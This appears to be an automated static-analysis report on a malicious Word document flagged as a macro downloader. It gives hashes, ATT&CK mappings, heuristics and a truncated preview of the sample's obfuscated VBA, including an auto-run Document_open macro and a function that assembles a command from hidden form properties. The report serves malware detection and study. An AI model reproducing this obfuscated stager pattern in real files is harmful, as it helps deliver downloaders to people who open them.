Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a8b4b72c52482f7…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 72.5 KB
Created: 2019-12-13 06:51:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 247a1aa482b1360a3620b16d0ca1d38e
SHA-1: 45db51df34184c707db7f97d78a247975a1f8b06
SHA-256: 7a8b4b72c52482f72a66795dcd0685b3c6faf2fd48736461171641fbacbc377d
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of malicious intent. The heuristics suggest the macro is designed to execute code, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature. No specific IOCs like URLs or file paths were directly extractable from the provided script due to obfuscation and truncation.

Heuristics (7)

  • ClamAV: Doc.Downloader.Generic-7451224-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-7451224-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8244 bytes
SHA-256: a8b5b1011aada0db9edd5d36c8907ecff42a6ea169d31cf77c8806a39d2a43bc

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Lljhsuihdpfu"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Oizivtefueia, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Zrvtkymqcpdn
      Case 532
         Wdcosjgvj = Cos(504)
         Nkuintqboph = Atn(737)
         Dolzxlzmxroe = Cos(498)
      Case 418
         Ddmehxcxoshov = Atn(469)
         Gqpukleyhy = 786
         Eptgetxnxckal = CDate(411)
      Case 30
         Atriqmzqa = CInt(537)
         Jkyfegjzyh = Log(Duxzoegojv)
         Eqqhmezs = Knosxeqmryfh
End Select
   Select Case Pmkwpxbblz
      Case 447
         Spphlkifdfdhc = Cos(999)
         Mirtnyazart = Atn(569)
         Lhmguvdikykuy = Cos(301)
      Case 162
         Jiduiiptu = Atn(153)
         Arppqswjt = 817
         Wmgdfbkgzpyv = CDate(815)
      Case 741
         Nzfrvnrbnvmt = CInt(623)
         Sxogiqmrn = Log(Njngscvz)
         Srrxjbvz = Mgcobarnzfw
End Select
   Select Case Jajtzexvhjqt
      Case 200
         Qyycbmshqhmfb = Cos(956)
         Ipcmwgnbtxun = Atn(67)
         Elbtflyh = Cos(695)
      Case 43
         Wbbjbhudzby = Atn(368)
         Hyrcxefhycg = 83
         Llvmvboopvedz = CDate(413)
      Case 793
         Rnockxtv = CInt(638)
         Acwgxyvyf = Log(Hnfxfyrdm)
         Sbqlndbyrqheu = Hswjftqujajf
End Select
Uoxuyzsxu
End Sub

Attribute VB_Name = "Ssdijpjrn"
Attribute VB_Base = "0{CAE4F635-CF4E-4A69-B5EA-5FF7DB352CF7}{89760FFD-0C7B-4D7A-9AD8-5BF2E8149268}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zftyfaxnmhn"
Function Fsdxjtoyka()
   Select Case Frernmjevejh
      Case 8
         Uieyirchv = Cos(323)
         Jqkgduhog = Atn(471)
         Wpahjkwh = Cos(638)
      Case 507
         Mqsboqwerywd = Atn(113)
         Wzxrkbtz = 765
         Moxbhrkoupw = CDate(63)
      Case 623
         Epdljocisgxk = CInt(545)
         Eweznmbpzt = Log(Anhjugxhscgqj)
         Iuiaqxeg = Pinqppjpmop
End Select
Lqfbfhwboutcn = Lljhsuihdpfu.Oizivtefueia
   Select Case Juqhoixb
      Case 388
         Cfjhjhttda = Cos(392)
         Gzmvhfwllht = Atn(247)
         Pkifwuhizmahd = Cos(908)
      Case 823
         Fekpfsorvsase = Atn(597)
         Umiltwlohfnig = 622
         Odmaghxdud = CDate(251)
      Case 281
         Mnvcciasoyrz = CInt(360)
         Qcksjhekdxgd = Log(Xiohtcyamdka)
         Wqlmbmqutcut = Jxwzoivg
End Select
Vfovdvtysscjm = Lqfbfhwboutcn + Ssdijpjrn.Tzaoqrwqfvvft + Ssdijpjrn.Xpabylbowh + Ssdijpjrn.Bzaqpzxmuvtaw
   Select Case Zsrcdnznp
      Case 694
         Ocpxpivphuzd = Cos(929)
         Zugrnfyz = Atn(842)
         Gzwunqosnqf = Cos(150)
      Case 796
         Rqgkiakzpaz = Atn(35)
         Twbpspxbrqmb = 7
         Fhpbxzfobgu = CDate(49)
      Case 17
         Uorzxquxsqyxq = CInt(350)
         Aaujgjeszyb = Log(Fuuucpcnaqo)
         Tmqrdgwqn = Ljpqvrawmf
End Select
Volnrlwv = Vfovdvtysscjm + Ssdijpjrn.Tbmbexondtx + Ssdijpjrn.Nsewjwkywlg.ControlTipText
   Select Case Suajhthfifv
      Case 664
         Kpjvmqtnuawd = Cos(67)
         Tzaluhwibosza = Atn(180)
         Bcibknsrrl = Cos(745)
      Case 516
         Dytefxwogiu = Atn(726)
         Vbnvcmppesxn = 293
         Jaiizmqtkhknb = CDate(464)
      Case 815
         Ctihjolfwpz = CInt(974)
         Yfwqdymn = Log(Uobcqfkp)
         Aczpgtlxvm = Upvflujd
End Select
Fsdxjtoyka = Gcogsfuow + Volnrlwv + Gcogsfuow
   Select Case Etioqtsrfaf
      Case 338
         Bxamcconha = Cos(677)
         Xywponptnthv = Atn(233)
         Uuefmcdmf = Cos(109)
      Case 791
         Tdodbxtxvtv = Atn(277)
         Rmpiyiqf = 729
         Iuiboiolshbu = CDate(996)
      Case 364
       
... (truncated)